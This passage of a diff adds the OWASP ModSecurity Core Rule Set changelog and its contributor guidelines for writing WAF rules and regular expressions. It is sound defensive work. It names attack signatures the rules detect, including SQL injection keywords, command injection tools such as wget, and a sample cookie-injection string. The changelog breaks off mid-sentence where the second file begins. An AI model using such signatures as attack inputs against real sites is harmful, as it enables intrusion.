+ https://www.modsecurity.org/tracker/browse/CORERULES-63
+* Moved all skipAfter actions in chained rules to the rule starter line (must have ModSec v2.5.13 or higher)
+ https://www.modsecurity.org/tracker/browse/MODSEC-159
+* Fixed restricted file extension bug with macro expansion
+ https://www.modsecurity.org/tracker/browse/CORERULES-60
+* Updated the SQLI TX variable macro expansion data in the 49 and 60 files so that
+ it matches what is being set in the sql injection conf file
+* Fixed typo in SQL Injection regexs - missing backslash for word boundary (b)
+ https://www.modsecurity.org/tracker/browse/CORERULES-62
+
+
+## Version 2.0.8 - 2010-08-27
+
+
+Improvements:
+* Updated the PHPIDS filters
+* Updated the SQL Injection filters to detect boolean attacks (1<2, foo == bar, etc..) 
+* Updated the SQL Injection filters to account for different quotes
+* Added UTF-8 encoding validation support to the modsecurity_crs_10_config.conf file
+* Added Rule ID 950109 to detect multiple URL encodings
+* Added two experimental rules to detect anomalous use of special characters
+
+Bug Fixes:
+* Fixed Encoding Detection RegEx (950107 and 950108)
+* Fixed rules-updater.pl script to better handle whitespace
+ https://www.modsecurity.org/tracker/browse/MODSEC-167
+* Fixed missing pass action bug in modsecurity_crs_21_protocol_anomalies.conf
+ https://www.modsecurity.org/tracker/browse/CORERULES-55
+* Fixed the anomaly scoring in the modsecurity_crs_41_phpids_filters.conf file
+ https://www.modsecurity.org/tracker/browse/CORERULES-54
+* Updated XSS rule id 958001 to improve the .cookie regex to reduce false positives
+ https://www.modsecurity.org/tracker/browse/CORERULES-29
+
+
+## Version 2.0.7 - 2010-06-04
+
+
+Improvements:
+* Added CSRF Protection Ruleset which will use Content Injection to add javascript to
+ specific outbound data and then validate the csrf token on subsequent requests.
+* Added new Application Defect Ruleset which will identify/fix missing HTTPOnly cookie
+ flags
+* Added Experimental XSS/Missing Output Escaping Ruleset which looks for user supplied
+ data being echoed back to user unchanged.
+* Added rules-updater.pl script and configuration file to allow users to automatically
+ download CRS rules from the CRS rules repository.
+* Added new SQLi keyword for ciel() and reverse() functions.
+* Updated the PHPIDS filters
+
+
+Bug Fixes:
+* Fixed false positives for Request Header Name matching in the 30 file by
+ adding boundary characters.
+* Added missing pass actions to @pmFromFile prequalifier rules
+* Added backslash to SQLi regex
+ https://www.modsecurity.org/tracker/browse/CORERULES-41
+* Fixed hard coded anomaly score in PHPIDS filter file
+ https://www.modsecurity.org/tracker/browse/CORERULES-45
+* Fixed restricted_extension false positive by adding boundary characters
+
+
+## Version 2.0.6 - 2010-02-26
+
+
+Bug Fixes:
+* Added missing transformation functions to SQLi rules.
+ https://www.modsecurity.org/tracker/browse/CORERULES-32
+* Fixed duplicate rule IDs.
+ https://www.modsecurity.org/tracker/browse/CORERULES-33
+* Fixed typo in @pmFromFile in the Comment SPAM rules
+ https://www.modsecurity.org/tracker/browse/CORERULES-34
+* Added macro expansion to Restricted Headers rule
+ https://www.modsecurity.org/tracker/browse/CORERULES-35
+* Fixed misspelled SecMarker
+ https://www.modsecurity.org/tracker/browse/CORERULES-36
+* Fixed missing chain action in Content-Type header check
+ https://www.modsecurity.org/tracker/browse/CORERULES-37
+* Update phpids filters to use pass action instead of block
+
+
+## Version 2.0.5 - 2010-02-01
+
+
+Improvements:
+* Removed previous 10 config files as they may conflict with local customized Mod configs.
+* Added a new 10 config file that allows the user to globally set TX variables to turn on/off
+ PARANOID_MODE inspection, set anomaly score levels and http policies.
+ Must have ModSecurity 2.5.12 to use the macro expansion in numeric operators.
+* Added Rule Logic and Reference links to rules descriptions.
+* Added Rule IDs to all rules.
+* Added tag data mapping to new OWASP Top 10 and AppSensor Projects, WASC Threat Classification
+* Removed Apache limit directives from the 23 file
+* Added macro expansion to 23 file checks.
+* Added @pmFromFile check to 35 bad robots file
+* Added malicious UA strings to 35 bad robots check
+* Created an experimental rules file
+* Updated HTTP Parameter Pollution (HPP) rule logic to concat data into a TX variable for inspection
+* Removed TX inspections for generic attacks and reverted to standard ARGS inspection
+ https://www.modsecurity.org/tracker/browse/MODSEC-120
+* Updated the variable list for standard inspections (ARGS|ARGS_NAMES|XML:/*) and moved the other
+ variables to the PARANOID list (REQUEST_URI|REQUEST_BODY|REQUEST_HEADERS|TX:HPP_DATA)
+* Moved converted ET Snort rules to the /optional_rules directory
+* Created a new Header Tagging ruleset (optional_rules) that will add matched rule data to the
+ request headers.
+* Updated Inbound blocking conf file to use macro expansion from the 10 config file settings
+* Added separate anomaly scores for inbound, outbound and total to be evaluated for blocking.
+* Updated the regex logic in the (1=1) rule to factor in quotes and other logical operators.
+* Updated the SPAMMER RBL check rules logic to only check once per IP/Day.
+* Added new outbound malware link detection rules.
+* Added PHP "call_user_func" to blacklist
+ Identified by SOGETI ESEC R&D
+
+Bug Fixes:
+* Removed Non-numeric Rule IDs
+ https://www.modsecurity.org/tracker/browse/CORERULES-28
+* Updated the variable list on SQLi rules.
+* Fixed outbound @pmFromFile action from allow to skipAfter to allow for outbound anomaly scoring
+ and blocking
+
+
+## Version 2.0.4 - 2009-11-30
+
+
+Improvements:
+* Updated converted PHPIDS signatures (https://svn.php-ids.org/svn/trunk/lib/IDS/default_filter.xml)
+* Updated PHPIDS rules logic to first search for payloads in ARGS and then if there is no match found
+ then search more generically in request_body|request_uri_raw
+* Updated PHPIDS rules logic to only set TX variables and to not log.
This allows for more clean
+ exceptions in the 48 file which can then expire/delete false positive TX matches and adjust the
+ anomaly scores. These rules will then inspect for any TX variables in phase:5 and create appropriate
+ alerts for any variable matches that exist.
+
+Bug Fixes:
+* Added Anomaly Score check to the 60 correlation file to recheck the anomaly score at the end of
+ phase:4 which would allow for blocking based on information leakage issues.
+
+
+## Version 2.0.3 - 2009-11-05
+
+
+Improvements:
+* Updated converted PHPIDS signatures (https://svn.php-ids.org/svn/trunk/lib/IDS/default_filter.xml)
+* Create a new PHPIDS Converter rules file (https://svn.php-ids.org/svn/trunk/lib/IDS/Converter.php)
+* Added new rules to identify multipart/form-data bypass attempts
+* Increased anomaly scoring (+100) for REQBODY_PROCESSOR_ERROR alerts
+
+Bug Fixes:
+* Added t:urlDecodeUni transformation function to phpids rules to fix both false positives/negatives
+ https://www.modsecurity.org/tracker/browse/CORERULES-17
+* Added new variable locations to the phpids filters
+ https://www.modsecurity.org/tracker/browse/CORERULES-19
+* Use of transformation functions can cause false negatives - added multiMatch action to phpids rules
+ https://www.modsecurity.org/tracker/browse/CORERULES-20
+* Fixed multipart parsing evasion issues by adding strict parsing rules
+ https://www.modsecurity.org/tracker/browse/CORERULES-21
+* Fixed typo in xss rules (missing |)
+ https://www.modsecurity.org/tracker/browse/CORERULES-22
+* Fixed regex text in IE8 XSS filters (changed to lowercase)
+ https://www.modsecurity.org/tracker/browse/CORERULES-23
+
+
+## Version 2.0.2 - 2009-09-11
+
+
+Improvements:
+* Added converted PHPIDS signatures (https://svn.php-ids.org/svn/trunk/lib/IDS/default_filter.xml)
+ https://www.modsecurity.org/tracker/browse/CORERULES-13
+
+Bug Fixes:
+* Rule 958297 - Fixed Comment SPAM UA false positive that triggered only on mozilla.
+ https://www.modsecurity.org/tracker/browse/CORERULES-15
+
+
+## Version 2.0.1 - 2009-08-07
+
+
+Improvements:
+* Updated the transformation functions used in the XSS/SQLi rules to improve performance
+ https://www.modsecurity.org/tracker/browse/CORERULES-10
+
+* Updated the variable/target list in the XSS rules
+ https://www.modsecurity.org/tracker/browse/CORERULES-11
+
+* Added XSS Filters from IE8
+ https://www.modsecurity.org/tracker/browse/CORERULES-12
+
+Bug Fixes:
+* Rule 958297 - Fixed unescaped double-quote issue in Comment SPAM UA rule.
+ https://www.modsecurity.org/tracker/browse/CORERULES-9
+
+
+## Version 2.0.0 - 2009-07-29
+
+
+New Rules & Features:
+* Fine Grained Policy
+ The rules have been split to having one signature per rule instead of having
+ all signatures combined into one optimized regular expression.
+ This should allow you to modify/disable events based on specific patterns
+ instead of having to deal with the whole rule.
+* Converted Snort Rules
+ Emerging Threat web attack rules have been converted.
+ http://www.emergingthreats.net/
+* Anomaly Scoring Mode Option
+ The rules have been updated to include anomaly scoring variables which allow
+ you to evaluate the score at the end of phase:2 and phase:5 and decide on what
+ logging and disruptive actions to take based on the score.
+* Correlated Events
+ There are rules in phase:5 that will provide some correlation between inbound
+ events and outbound events and will provide a result of successful atttack or
+ attempted attack.
+* Updated Severity Ratings
+ The severity ratings in the rules have been updated to the following:
+ - 0: Emergency - is generated from correlation where there is an inbound attack and
+ an outbound leakage.
+ - 1: Alert - is generated from correlation where there is an inbound attack and an
+ outbound application level error.
+ - 2: Critical - is the highest severity level possible without correlation.
It is
+ normally generated by the web attack rules (40 level files).
+ - 3: Error - is generated mostly from outbound leakabe rules (50 level files).
+ - 4: Warning - is generated by malicious client rules (35 level files).
+ - 5: Notice - is generated by the Protocol policy and anomaly files.
+ - 6: Info - is generated by the search engine clients (55 marketing file).
+* Updated Comment SPAM Protections
+ Updated rules to include RBL lookups and client fingerprinting concepts from
+ Bad Behavior (www.bad-behavior.ioerror.us)
+* Creation of Global Collection
+ Automatically create a Global collection in the *10* config file. Other rules
+ can then access it.
+* Use of Block Action
+ Updated the rules to use the "block" action. This allows the Admin to globally
+ set the desired block action once with SecDefaultAction in the *10* config file
+ rather than having to edit the disruptive actions in all of the rules or for
+ the need to have multiple versions of the rules (blocking vs. non-blocking).
+* "Possible HTTP Parameter Pollution Attack: Multiple Parameters with the same Name."
+ http://tacticalwebappsec.blogspot.com/2009/05/http-parameter-pollution.html
+* Added new generic RFI detection rules.
+ http://tacticalwebappsec.blogspot.com/2009/06/generic-remote-file-inclusion-attack.html
+* "Possibly malicious iframe tag in output" (Rules 981001,981002)
+ Planting invisible iframes in a site can be used by attackers to point users
+ from the victim site to their malicious site. This is actually as if the
+ user was visiting the attacker's site himself, causing the user's browser to
+ process the content in the attacker's site.
+
+New Events:
+* Rule 960019 - Expect Header Not Allowed.
+* Rule 960020 - Pragma Header Requires Cache-Control Header
+* Rule 958290 - Invalid Character in Request - Browsers should not send the (#) character
+ as it is reserved for use as a fragment identifier within the html page.
+* Rule 958291 - Range: field exists and begins with 0.
+* Rule 958292 - Invalid Request Header Found.
+* Rule 958293 - Lowercase Via Request Header Found.
+* Rule 958294 - Common SPAM Proxies found in Via Request Header.
+* Rule 958295 - Multiple/Conflicting Connection Header Data Found.
+* Rule 958296 - Request Indicates a SPAM client accessed the Site.
+* Rule 958297 - Common SPAM/Email Harvester crawler.
+* Rule 958298 - Common SPAM/Email Harvester crawler
+
+Bug Fixes:
+* Rule 950107 - Split the rule into 2 separate rules to factor in the
+ Content-Type when inspecting the REQUEST_BODY variable.
+* Rule 960017 - Bug fix for when having port in the host header.
+* Rule 960014 - Bug fix to correlate the SERVER_NAME variable.
+* Rule 950801 - Increased the logic so that the rule will only run if the web site
+ uses UTF-8 Encoding.
+* Rules 999210,999211 - Bug fix to move ctl actions to last rule, add OPTIONS and
+ allow the IPv6 loopback address
+* Rule 950117 - Updated the RFI logic to factor in both a trailing "?" in the ARG
+ and to identify offsite hosts by comparing the ARG URI to the Host
+ header. Due to this rule now being stronger, moved it from optional
+ tight security rule to *40* generic attacks file.
+
+Other Fixes:
+* Added more HTTP Protocol violations to *20* file.
+* Set the SecDefaultAction in the *10* config file to log/pass (This was the
+ default setting, however this sets it explicitly.
+* Added SecResponseBodyLimitAction ProcessPartial to the *10* config file. This
+ was added so that when running the SecRuleEngine in DetectionOnly mode, it will
+ not deny response bodies that go over the size restrictions.
+* Changed SecServerSignature to "Apache/1.3.28"
+* Fixed the use of SkipAfter and SecMarkers to make it consistent. Now have
+ BEGIN and END SecMarkers for rule groups to more accurately allow moving to
+ proper locations.
+* Fixed the @pm/@pmFromFile pre-qualifier logic to allow for operator inversion.
+ This removes the need for some SecAction/SkipAfter rules.
+* Updated rule formatting to easily show rule containers (SecMarkers, pre-qualifier
+ rules and chained rules).
+
+
+## Version 1.6.1 - 2008-04-22
+
+
+* Fixed a bug where phases and transformations where not specified explicitly
+ in rules. The issue affected a significant number of rules, and we strongly
+ recommend to upgrade.
+
+
+## Version 1.6.0 - 2008-02-19
+
+
+New Rulesets & Features:
+* 42 - Tight Security
+ This ruleset contains currently 2 rules which are considered highly prone
+ to FPs. They take care of Path Traversal attacks, and RFI attacks. This
+ ruleset is included in the optional_rulesets dir
+* 42 - Comment Spam
+ Comment Spam is used by the spammers to increase their rating in search
+ engines by posting links to their site in other sites that allow posting
+ of comments and messages. The rules in this ruleset will work against that.
+ (Requires ModSecurity 2.5)
+* Tags
+ A single type of attack is often detected by multiple rules. The new alert
+ classification tags solve this issue by providing an alternative alert type
+ indication and can serve for filtering and analysis of audit logs.
+ The classification tags are hierarchical with slashes separating levels.
+ Usually there are two levels with the top level describing the alert group
+ and the lower level denoting the alert type itself, for example:
+ WEB_ATTACK/SQL_INJECTION.
+
+False Positives Fixes:
+* Rule 960903 - Moved to phase 4 instead of 5 to avoid FPs
+* Rule 950107 - Will look for invalid url decoding in variables that are not
+ automatically url decoded
+
+Additional rules logic:
+* Using the new "logdata" action for logging the matched signature in rules
+* When logging an event once, init the collection only if the alert needs to log
+* Using the new operator @pm as a qualifier before large rules to enhance
+ performance (Requires ModSecurity 2.5)
+* SQL injection - A smarter regexp is used to detect 1=1,2=2,etc.. and not
+ only 1=1.
(Thanks to Marc Stern for the idea)
+* New XSS signatures - iframe & flash XSS
+
+
+
+## Version 1.5.1 - 2007-12-06
+
+
+False Positives Fixes:
+* Protocol Anomalies (file 21) - exception for Apache SSL pinger (Request: GET /)
+
+New Events:
+* 960019 - Detect HTTP/0.9 Requests
+ HTTP/0.9 request are not common these days. This rule will log by default,
+ and block in the blocking version of file 21
+
+Other Fixes:
+* File 40, Rules 950004,950005 - Repaired the correction for the double
+ url decoding problem
+* File 55 contained empty regular expressions. Fixed.
+
+
+## Version 1.5 - 2007-11-23
+
+
+New Rulesets:
+* 23 - Request Limits
+ "Judging by appearances". This rulesets contains rules blocking based on
+ the size of the request, for example, a request with too many arguments
+ will be denied.
+
+Default policy changes:
+* XML protection off by default
+* BLOCKING dir renamed to optional_rules
+* Ruleset 55 (marketing) is now optional (added to the optional_rules dir)
+* Ruleset 21 - The exception for apache internal monitor will not log anymore
+
+New Events:
+* 960912 - Invalid request body
+ Malformed content will not be parsed by modsecurity, but still there might
+ be applications that will parse it, ignoring the errors.
+* 960913 - Invalid Request
+ Will trigger a security event when request was rejected by apache with
+ code 400, without going through ModSecurity rules.
+
+Additional rules logic:
+* 950001 - New signature: delete from
+* 950007 - New signature: waitfor delay
+
+False Positives Fixes:
+* 950006 - Will not be looking for /cc pattern in User-Agent header
+* 950002 - "Internet Explorer" signature removed
+* Double decoding bug used to cause FPs. Some of the parameters are already
+ url-decoded by apache. This caused FPs when the rule performed another
+ url-decoding transformation. The rules have been split so that parameters
+ already decoded by apache will not be decoded by the rules anymore.
+* 960911 - Expression is much more permissive now
+* 950801 - Commented out entirely. NOTE: If your system uses UTF8 encoding,
+ then you should uncomment this rule (in file 20)
+
+
+version 1.4.3 - 2007-07-21
+
+
+New Events:
+* 950012 - HTTP Request Smuggling
+ For more info on this attack:
+ http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf
+* 960912 - Invalid request body
+ Malformed content will not be parsed by modsecurity, but still there might
+ be applications that will parse it, ignoring the errors.
+* 960913 - Invalid Request
+ Will trigger a security event when request was rejected by apache with
+ code 400, without going through ModSecurity rules.
+
+False Positives Fixes:
+* 950107 - Will allow a % sign in the middle of a string as well
+* 960911 - A more accurate expression based on the rfc:
+ http://www.ietf.org/rfc/rfc2396.txt
+* 950015 - Will not look for http/ pattern in the request headers
+
+Additional rules logic:
+* Since Apache applies scope directives only after ModSecurity phase 1
+ this directives cannot be used to exclude phase 1 rules. Therefore
+ we moved all inspection rules to phase 2.
+
+
+
+version 1.4 build 2 - 2007-05-17
+
+
+New Feature:
+* Search for signatures in XML content
+ XML Content will be parsed and ispected for signatures
+
+New Events:
+* 950116 - Unicode Full/Half Width Abuse Attack Attempt
+ Full-width unicode can by used to bypass content inspection. Such encoding will be forbidden
+ http://www.kb.cert.org/vuls/id/739224
+* 960911 - Invalid HTTP request line
+ Enforce request line to be valid, i.e.:
+* 960904 - Request Missing Content-Type (when there is content)
+ When a request contains content, the content-type must be specified.
If not, the content will not be inspected
+* 970018 - IIS installed in default location (any drive)
+ Log once if IIS in installed in the /Inetpub directory (on any drive, not only C)
+* 950019 - Email Injection
+ Web forms used for sending mail (such as "tell a friend") are often manipulated by spammers for sending anonymous emails
+
+Regular expressions fixes:
+* Further optimization of some regular expressions (using the non-greediness operator)
+ The non-greediness operator, , prevents excessive backtracking
+
+FP fixes:
+* Rule 950107 - Will allow a parameter to end in a % sign from now on
+
+
+version 1.4 - 2007-05-02
+
+
+New Events:
+* 970021 - WebLogic information disclosure
+ Matching of "JSP compile error" in the response body, will trigger this rule, with severity 4 (Warning)
+* 950015,950910,950911 - HTTP Response Splitting
+ Looking for HTTP Response Splitting patterns as described in Amit Klein's excellent white paper:
+ http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
+ModSecurity does not support compressed content at the moment. Thus, the following rules have been added:
+* 960902 - Content-Encoding in request not supported
+ Any incoming compressed request will be denied
+* 960903 - Content-Encoding in response not supported
+ An outgoing compressed response will be logged to alert, but ONLY ONCE.
+
+False Positives Fixes:
+* Removed <.exe>,<.shtml> from restricted extensions
+* Will not be looking for SQL Injection signatures , in the Via request header
+* Excluded Referer header from SQL injection, XSS and command injection rules
+* Excluded X-OS-Prefs header from command injection rule
+* Will be looking for command injection signatures in
+ REQUEST_COOKIES|REQUEST_COOKIES_NAMES instead of REQUEST_HEADERS:Cookie.
+* Allowing charset specification in the Content-Type + +Additional rules logic: +* Corrected match of OPTIONS method in event 960015 +* Changed location for event 960014 (proxy access) to REQUEST_URI_RAW +* Moved all rules apart from method inspection from phase 1 to phase 2 - + This will enable viewing content if such a rule triggers as well as setting + exceptions using Apache scope tags. +* Added match for double quote in addition to single quote for signature (SQL Injection) +* Added 1=1 signature (SQL Injection) + + +version 1.3.2 build 4 2007-01-17 + + +Fixed apache 2.4 dummy requests exclusion +Added persistent PDF UXSS detection rule + + +## Version 1.3.2 build 3 2007-01-10 + + +Fixed regular expression in rule 960010 (file #30) to allow multipart form data +content + + +## Version 1.3.2 - 2006-12-27 + + +New events: +* 960037 Directory is restricted by policy +* 960038 HTTP header is restricted by policy + +Regular expressions fixes: +* Regular expressions with @ at end of beginning (for example "@import) +* Regular expressions with un-escaped "." +* Command Injections now always require certain characters both before and after the command. Important since many are common English words (finger, mail) +* The command injection wget is not searched in the UA header as it has different meaning there. +* LDAP Fixed to reduce FPs: + + More accurate regular expressions + + high bit characters not accepted between signature tokens. +* Do not detect The CRS project values third party contributions. To make the contribution process as easy as possible, a helpful set of contribution guidelines are in place which all contributors and developers are asked to adhere to. + +## Getting Started with a New Contribution + +1. Sign in to [GitHub](https://github.com/join). +2. Open a [new issue](https://github.com/coreruleset/coreruleset/issues) for the contribution, *assuming a similar issue doesn't already exist*. 
+ * **Clearly describe the issue**, including steps to reproduce if reporting a bug.
+ * **Specify the CRS version in question** if reporting a bug.
+ * Bonus points for submitting tests along with the issue.
+3. Fork the repository on GitHub and begin making changes there.
+4. Signed commits are preferred. (For more information and help with this, refer to the [GitHub documentation](https://docs.github.com/en/authentication/managing-commit-signature-verification/signing-commits)).
+
+## Making Changes
+
+* Base any changes on the latest dev branch (e.g., `v4.0/dev`).
+* Create a topic branch for each new contribution.
+* Fix only one problem at a time. This helps to quickly test and merge submitted changes. If intending to fix *multiple unrelated problems* then use a separate branch for each problem.
+* Make commits of logical units.
+* Make sure commits adhere to the contribution guidelines presented in this document.
+* Make sure commit messages follow the [standard Git format](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html).
+* Make sure changes are submitted as a pull request (PR) on [GitHub](https://github.com/coreruleset/coreruleset/pulls).
+ * PR titles should follow the [Conventional Commits format](https://www.conventionalcommits.org/en/v1.0.0/), for example: `fix(rce): Fix a FP in rule 912345 with keyword 'time'`.
+ * If a PR only affects a single rule then the rule ID should be included in the title.
+ * If a PR title does not follow the correct format then a CRS developer will fix it.
+
+## General Formatting Guidelines for Rules Contributions
+
+* American English should be used throughout.
+* 4 spaces should be used for indentation (no tabs).
+* Files must end with a single newline character.
+* No trailing whitespace at EOL.
+* No trailing blank lines at EOF (only the required single EOF newline character is allowed).
+* Adhere to an 80 character line length limit where possible.
+* Add comments where possible and clearly explain any new rules.
+* Comments must not appear between chained rules and should instead be placed before the start of a rule chain.
+* All [chained rules](https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual-(v2.x)#chain) should be indented like so, for readability:
+```
+SecRule .. .. \
+ "..."
+ SecRule .. .. \
+ "..."
+ SecRule .. .. \
+ "..."
+```
+- Action lists in rules must always be enclosed in double quotes for readability, even if there is only one action (e.g., use `"chain"` instead of `chain`, and `"ctl:requestBodyAccess=Off"` instead of `ctl:requestBodyAccess=Off`).
+- Always use numbers for phases instead of names.
+- Format all use of `SecMarker` using double quotes, using UPPERCASE, and separating words with hyphens. For example:
+```
+SecMarker "END-RESPONSE-959-BLOCKING-EVALUATION"
+SecMarker "END-REQUEST-910-IP-REPUTATION"
+```
+- Rule actions should appear in the following order, for consistency:
+```
+id
+phase
+allow | block | deny | drop | pass | proxy | redirect
+status
+capture
+t:xxx
+log
+nolog
+auditlog
+noauditlog
+msg
+logdata
+tag
+sanitiseArg
+sanitiseRequestHeader
+sanitiseMatched
+sanitiseMatchedBytes
+ctl
+ver
+severity
+multiMatch
+initcol
+setenv
+setvar
+expirevar
+chain
+skip
+skipAfter
+```
+- Rule operators must always be explicitly specified. Although ModSecurity defaults to using the `@rx` operator, for clarity `@rx` should always be explicitly specified when used. For example, write:
+```
+SecRule ARGS "@rx foo" "id:1,phase:1,pass,t:none"
+```
+instead of
+```
+SecRule ARGS "foo" "id:1,phase:1,pass,t:none"
+```
+
+## Variable Naming Conventions
+
+* Variable names should be lowercase and should use the characters a-z, 0-9, and underscores only.
+* To reflect the different syntax between *defining* a variable (using `setvar`) and *using* a variable, the following visual distinction should be applied:
+ * **Variable definition:** Lowercase letters for collection name, dot as the separator, variable name. E.g.: `setvar:tx.foo_bar_variable`
+ * **Variable use:** Capital letters for collection name, colon as the separator, variable name. E.g.: `SecRule TX:foo_bar_variable`
+
+## Writing Regular Expressions
+
+* Use the following character class, in the stated order, to cover alphanumeric characters plus underscores and hyphens: `[a-zA-Z0-9_-]`
+
+### Portable Backslash Representation
+
+CRS uses `\x5c` to represent the backslash `\` character in regular expressions. Some of the reasons for this are:
+
+* It's portable across web servers and WAF engines: it works with Apache, Nginx, and Coraza.
+* It works with the [crs-toolchain](https://coreruleset.org/docs/development/crs_toolchain/) for building optimized regular expressions.
+
+The older style of representing a backslash using the character class `[\\\\]` must _not_ be used. This was previously used in CRS to get consistent results between Apache and Nginx, owing to a quirk with how Apache would "double un-escape" character escapes. For future reference, the decision was made to stop using this older method because:
+
+* It can be confusing and difficult to understand how it works.
+* It doesn't work with [crs-toolchain](https://coreruleset.org/docs/development/crs_toolchain/).
+* It doesn't work with Coraza.
+* It isn't obvious how to use it in a character class, e.g., `[a-zA-Z]`.
+
+### Forward Slash Representation
+
+CRS uses literal, *unescaped* forward slash `/` characters in regular expressions.
+
+Regular expression engines and libraries based on PCRE use the forward slash `/` character as the default delimiter. As such, forward slashes are often escaped in regular expression patterns.
In the interests of readability, CRS does *not* escape forward slashes in regular expression patterns, which may seem unusual at first to new contributors.
+
+If testing a CRS regular expression using a third party tool, it may be useful to change the delimiter to something other than `/` if a testing tool raises errors because a CRS pattern features unescaped forward slashes.
+
+### When and Why to Anchor Regular Expressions
+
+Engines running the OWASP Core Rule Set will use regular expressions to _search_ the input string, i.e., the regular expression engine is asked to find the first match in the input string. If an expression needs to match the entire input then the expression must be anchored appropriately.
+
+#### Beginning of String Anchor (^)
+
+It is often necessary to match something at the start of the input to prevent false positives that match the same string in the middle of another argument, for example. Consider a scenario where the goal is to match the value of `REQUEST_HEADERS:Content-Type` to `multipart/form-data`. The following regular expression could be used:
+
+```python
+"@rx multipart/form-data"
+```
+
+HTTP headers can contain multiple values, and it may be necessary to guarantee that the value being searched for is the _first_ value of the header. There are different ways to do this but the simplest one is to use the `^` caret anchor to match the beginning of the string:
+
+```python
+"@rx ^multipart/form-data"
+```
+
+It will also be useful to ignore case sensitivity in this scenario:
+
+```python
+"@rx (?i)^multipart/form-data"
+```
+
+#### End of String Anchor ($)
+
+Consider, for example, needing to find the string `/admin/content/assets/add/evil` in the `REQUEST_FILENAME`.
This could be achieved with the following regular expression:
+
+```python
+"@rx /admin/content/assets/add/evil"
+```
+
+If the input is changed, it can be seen that this expression can easily produce a false positive: `/admin/content/assets/add/evilbutactuallynot/nonevilfile`. If it is known that the file being searched for can't be in a subdirectory of `add` then the `$` anchor can be used to match the end of the input:
+
+```python
+"@rx /admin/content/assets/add/evil$"
+```
+
+This could be made a bit more general:
+
+```python
+"@rx /admin/content/assets/add/[a-z]+$"
+```
+
+#### Matching the Entire Input String
+
+It is sometimes necessary to match the entire input string to ensure that it _exactly_ matches what is expected. It might be necessary to find the "edit" action transmitted by WordPress, for example. To avoid false positives on variations (e.g., "myedit", "the edit", "editable", etc.), the `^` caret and `$` dollar anchors can be used to indicate that an exact string is expected. For example, to only match the _exact_ strings `edit` or `editpost`:
+
+```python
+"@rx ^(?:edit|editpost)$"
+```
+
+#### Other Anchors
+
+Other anchors apart from `^` caret and `$` dollar exist, such as `\A`, `\G`, and `\Z` in PCRE. CRS **strongly discourages** the use of other anchors for the following reasons:
+
+- Not all regular expression engines support all anchors and the OWASP Core Rule Set should be compatible with as many regular expression engines as possible.
+- Their function is sometimes not trivial.
+- They aren't well known and would require additional documentation.
+- In most cases that would justify their use the regular expression can be transformed into a form that doesn't require them, or the rule can be transformed (e.g., with an additional chain rule).
+
+### Use Capture Groups Sparingly
+
+Capture groups, i.e., parts of the regular expression surrounded by parentheses (`(` and `)`), are used to store the matched information from a string in memory for later use. Capturing input uses both additional CPU cycles and additional memory. In many cases, parentheses are *mistakenly* used for grouping and ensuring precedence.
+
+To group parts of a regular expression, or to ensure that the expression uses the precedence required, surround the concerning parts with `(?:` and `)`. Such a group is referred to as being "non-capturing". The following will create a capture group:
+
+```python
+"@rx a|(b|c)d"
+```
+
+On the other hand, this will create a _non-capturing_ group, guaranteeing the precedence of the alternative _without_ capturing the input:
+
+```python
+"@rx a|(?:b|c)d"
+```
+
+### Lazy Matching
+
+The question mark `?` can be used to turn "greedy" quantifiers into "lazy" quantifiers, i.e., `.+` and `.*` are greedy while `.+?` and `.*?` are lazy. Using lazy quantifiers can help with writing certain expressions that wouldn't otherwise be possible. However, in backtracking regular expression engines, like PCRE, lazy quantifiers can also be a source of performance issues. The following is an example of an expression that uses a lazy quantifier:
+
+```python
+"@rx (?i)\.cookie\b.*?;\W*?(?:expires|domain)\W*?="
+```
+
+This expression matches cookie values in HTML to detect session fixation attacks. The input string could be `document.cookie = "name=evil; domain=https://example.com";`.
+
+The lazy quantifiers in this expression are used to reduce the amount of backtracking that engines such as PCRE have to perform (others, such as RE2, are not affected by this). Since the asterisk `*` is greedy, `.*` would match every character in the input up to the end, at which point the regular expression engine would realize that the next character, `;`, can't be matched and it will backtrack to the previous position (`;`).
A few iterations later, the engine will realize that the character `d` from `domain` can't be matched and it will backtrack again. This will happen again and again, until the `;` at `evil;` is found. Only then can the engine proceed with the next part of the expression. + +Using lazy quantifiers, the regular expression engine will instead match _as few characters as possible_. The engine will match ` ` (a space), then look for `;` and will not find it. The match will then be expanded to ` =` and, again, a match of `;` is attempted. This continues until the match is ` = "name=evil` and the engine finds `;`. While lazy matching still includes some work, in this case, backtracking would require many more steps. + +Lazy matching can have the inverse effect, though. Consider the following expression: + +```python +"@rx (?i)\b(?:s(?:tyle|rc)|href)\b[\s\S]*?=" +``` + +It matches some HTML attributes and then expects to see `=`. Using a somewhat contrived input, the lazy quantifier will require more steps to match then the greedy version would: `style                     =`. With the lazy quantifier, the regular expression engine will expand the match by one character for each of the space characters in the input, which means 21 steps in this case. With the greedy quantifier, the engine would match up to the end in a single step, backtrack one character and then match `=` (note that `=` is included in `[\s\S]`), which makes 3 steps. + +To summarize: **be very mindful about when and why you use lazy quantifiers in your regular expressions**. + +### Possessive Quantifiers and Atomic Groups + +Lazy and greedy matching change the order in which a regular expression engine processes a regular expression. However, the order of execution does not influence the backtracking behavior of backtracking engines. + +Possessive quantifiers (e.g., `x++`) and atomic groups (e.g., `(?>x)`) are tools that can be used to prevent a backtracking engine from backtracking. 
They _can_ be used for performance optimization but are only supported by backtracking engines and, therefore, are not permitted in CRS rules. + +### Writing Regular Expressions for Non-Backtracking Compatibility + +Traditional regular expression engines use backtracking to solve some additional problems, such as finding a string that is preceded or followed by another string. While this functionality can certainly come in handy and has its place in certain applications, it can also lead to performance issues and, in uncontrolled environments, open up possibilities for attacks (the term "[ReDoS](https://en.wikipedia.org/wiki/ReDoS)" is often used to describe an attack that exhausts process or system resources due to excessive backtracking). + +The OWASP Core Rule Set tries to be compatible with non-backtracking regular expression engines, such as RE2, because: + +- Non-backtracking engines are less vulnerable to ReDoS attacks. +- Non-backtracking engines can often outperform backtracking engines. +- CRS aims to leave the choice of the engine to the user/system. + +To ensure compatibility with non-backtracking regular expression engines, the following operations are **not** permitted in regular expressions: + +- positive lookahead (e.g., `(?=regex)`) +- negative lookahead (e.g., `(?!regex)`) +- positive lookbehind (e.g., `(?<=regex)`) +- negative lookbehind (e.g., `(?regex)`) +- backreferences (e.g., `\1`) +- named backreferences (e.g., `(?P=name)`) +- conditionals (e.g., `(?(regex)then|else)`) +- recursive calls to capture groups (e.g., `(?1)`) +- possessive quantifiers 